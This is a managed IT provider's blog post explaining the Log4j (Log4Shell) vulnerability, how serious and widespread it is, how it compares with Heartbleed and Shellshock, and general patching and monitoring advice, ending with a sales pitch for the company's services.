Log4j Flaw Is the Most Serious Cyber Threat in Years, Security Experts Say

Security analysts are alarmed about a bug in software few people know about — the Log4j logging utility for Java applications. In November, researchers identified a zero-day exploit that affected the Java version of the Minecraft video game. Hackers were able to trick Log4j into storing specific character strings that allowed them to take control of the compromised machine. The hackers could then execute malicious code remotely, spread malware or steal sensitive information.

Log4j Vulnerability

The Log4j flaw is alarming because the open-source utility is widely used in Java-based apps to record routine system events and errors. Analysts with Google’s Open Source Insights Team found that about 8 percent of the 440,000 Java packages stored in the Maven Central Repository used versions of Log4j that were vulnerable to the exploit.

Researchers with Microsoft say that hackers in China, North Korea and other adversarial nation-states are actively scanning systems for the vulnerability, dubbed Log4Shell. During peak activity in December, Cloudflare reported approximately 20,000 exploit attempts per minute. The vulnerability is relatively easy to exploit, which means that even hackers with limited skills can take advantage of it. Toolkits are available on the dark web.

 

Log4j Flaw Causing Widespread Alarm

Jen Easterly, director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA), has said that Log4Shell is the most serious vulnerability she has seen in her decades-long career. Other security experts agree.

In a recent article on The Verge, Cloudflare CTO John Graham-Cumming said, “There’s a tremendous amount of Java software connected to the Internet and in back-end systems. When I look back over the last 10 years, there are only two other exploits I can think of with a similar severity: Heartbleed, which allowed you to get information from servers that should have been secure, and Shellshock, which allowed you to run code on a remote machine.”

Log4Shell is the most serious vulnerability to come along in years.

Heartbleed, discovered in April 2014, was a bug in the OpenSSL encryption software that allowed hackers to steal encryption keys and other sensitive data from a web server’s memory. Shellshock, which was discovered in September of that year, was a flaw in the Unix Bash shell that enabled remote code execution. Both vulnerabilities caused widespread panic at the time.

Log4j is in some ways worse because it requires someone familiar with Java to review the organization’s software and find vulnerable versions of Log4j. Often, the utility is bundled with other software or called indirectly from other libraries.

 

Mitigating the Threat

The bug was patched in the latest version of Log4j, but the strategy for applying the fix will vary depending on how the utility is used. For third-party software such as Minecraft, it’s as simple as installing the latest version. For in-house applications, developers and system administrators will have to apply the appropriate patch to any vulnerable code they identify.

Despite the difficulty, organizations should immediately take steps to protect against the vulnerability. The CISA has provided a list of affected products and vendor updates and guidance on mitigating the threat. The Federal Trade Commission has warned that it will take action against companies that don’t protect consumer data.

Even if the bug is patched, organizations should assume they’ve been compromised. They should continuously monitor systems for anomalous behavior and indicators of compromise. Because hackers are exploiting the vulnerability in a variety of ways, traditional security tools that rely on signature-based detection will likely be unable to identify attacks. Organizations should implement a layered security approach with advanced detection capabilities.

Log4Shell is the most serious vulnerability to come along in years. The cybersecurity experts at GDS are here to help you assess your exposure and reduce your risk. Call today for a confidential consultation.

  

 

Benefits of Managed IT Services from Global Data Systems

  • Strategic Managed IT: We help you solve your technology related business problems.
  • Connectivity: We get you reliable, secure connectivity anywhere in the western hemisphere in 48 hours.
  • Support: When you need help simply call our 24x7x365 support number.
  • Billing: Instead of managing hundreds of vendors - get one, easy to read bill from GDS.

Contact Managed Services Provider, Global Data Systems >